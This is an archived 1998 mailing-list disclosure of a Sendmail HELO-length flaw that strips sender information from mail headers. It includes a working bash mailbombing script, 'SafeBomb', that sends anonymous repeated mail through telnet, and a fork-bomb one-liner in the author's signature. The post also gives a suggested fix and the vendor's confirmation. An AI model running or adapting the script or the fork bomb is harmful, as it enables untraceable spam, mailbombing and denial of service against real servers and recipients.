Seems like MS Exchange Internet Mail Service 5.5 is vulnerable too.
--
"BSD code sucks. Of course, everything else sucks far more."
- Theo de Raadt (OpenBSD President)
> -----Original Message-----
> From: Micha? Zalewski <lcamtufat_private>
> To: infoat_private <infoat_private>
> Date: 10 stycznia 1998 12:28
> Subject: Sendmail 8.8.8 (qmail?) HELO hole.
>
>
> Here's a brief description of Sendmail (qmail) hole I found
> recently:
>
> When someone mailbombs you, or tries to send fakemail, spam, etc -
> sendmail normally attachs sender's host name and it's address
> to outgoing message:
>
> --
> >From spamat_private Mon Jan 5 22:08:21 1998
> Received: from spammer (marcat_private [150.129.84.5])
> by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376
> for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
> Date: Mon, 5 Jan 1998 22:07:54 +0100
> From: spamat_private
> Message-Id: <3.14159665@pi>
>
> MAILBOOM!!!
> --
>
> That's perfect - now you know, who is responsible for that annoying
> junk in your mailbox: "Received: from spammer (marcat_private
> [150.129.84.5])". Nothing easier...
> But I found a small hole, which allows user to hide it's personality,
> and send mails anonymously. The only thing you should do is to
> pass HELO string longer than approx. 1024 B - sender's location and
> other very useful information will be cropped!!! Message
> headers should become not interesting. Sometimes, sender
> may become quite untraceable (but not always, if it's possible
> to obtain logs from machine which has been used to sent):
>
> --
> >From spamat_private Mon Jan 5 22:09:05 1998
> Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx
> Date: Mon, 5 Jan 1998 22:08:52 +0100
> From: spamat_private
> Message-Id: <3.14159665@pi>
>
> MAILBOOM!!! Now guess who am I...
> --
>
>
> Here's a simple example of Sendmail's HELO hole usage. Note, this
> script has been written ONLY to show how easy may be sending
> fakemails, mailbombs, with cooperation of Sendmail ;) Script is
> very slow and restricted in many ways, but explains the problem
> well (note, some of non-Berkeley daemons are also affected,
> probably Qmail?):
>
> -- EXPLOIT CODE --
> #!/bin/bash
> TMPDIR=/tmp/`whoami`
> PLIK=$TMPDIR/.safe
> TIMEOUT=2
> LIMIT=10
> MAX=20
>
> echo
> echo "SafeBomb 1.02b -- sendmail HELO hole usage example"
> echo "Author: Michal Zalewski <lcamtufat_private>"
> echo
>
> if [ "$4" = "" ]; then
> echo "USAGE: $0 msgfile address server sender"
> echo
> echo " msgfile - file to send as a message body"
> echo " address - address of lucky recipient"
> echo " server - outgoing smtp server w/sendmail"
> echo " sender - introduce yourself"
> echo
> echo "WARNING: For educational use ONLY. Mailbombing is illegal."
> echo "Think twice BEFORE you use this program in any way. Also,"
> echo "I've never said this program is 100% safe nor bug-free."
> echo
> sleep 1
> exit 0
> fi
>
> if [ ! -f $1 ]; then
> echo "Message file not found."
> echo
> exit 0
> fi
>
> echo -n "Preparing message..."
> mkdir $TMPDIR &>/dev/null
> chmod 700 $TMPDIR
> echo "echo \"helo
> _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
> omb__safebomb__safebomb__safebomb__safebomb__sa
> febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
> __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
> ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_
> _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
> bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__
> safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
> omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s
> afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo
> mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa
> febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom
> b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
> ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
> b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf
> ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb
> __safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe
> bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_
> _safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb
> omb_\"" >$PLIK
> echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK
> echo "echo \"rcpt to: $2\"" >>$PLIK
> echo "echo \"data\"" >>$PLIK
> echo "cat <<__qniec__" >>$PLIK
> cat $1 >>$PLIK
> echo "__qniec__" >>$PLIK
> echo "echo \".\"" >>$PLIK
> echo "echo \"quit\"" >>$PLIK
> echo "sleep $TIMEOUT" >>$PLIK
> chmod +x $PLIK
> echo "OK"
>
> echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."
> SENT=0
>
> while [ -f $1 ]; do
> $PLIK|telnet $3 25 &>/dev/null &
> let SENT=SENT+1
> echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
> CONNECTED=`ps|grep -c "telnet $3"`
> if [ "$LIMIT" -le "$CONNECTED" ]; then
> while [ "$LIMIT" -le "$CONNECTED" ]; do
> sleep 1
> done
> fi
> if [ "$SENT" -ge "$MAX" ]; then
> echo "It's just an example, sorry."
> echo
> exit 0
> fi
> done
> -- EOF --
>
> Suggested fix: insert additional length limit into HELO/EHLO
> parameter scanning routine OR disable AllowBogusHELO (but it
> may cause serious troubles). I have no 8.8.8 sources at the
> time, so execuse me if it's unclear.
>
> PS:
>
> --
> From: Gregory Neil Shapiro <sendmail+gshapiroat_private>
>
> I was able to reproduce the header problem by lengthening the HELO string
> in your script.
>
> [...]
>
> This will be fixed in sendmail 8.9.
> --
>
> _______________________________________________________________________
> Micha? Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
> IterowaÖ jest rzecz+ ludzk+, wykonywaÖ rekursywnie - bosk+ [P. Deustch]
> =--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=
>
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:55:02 PDT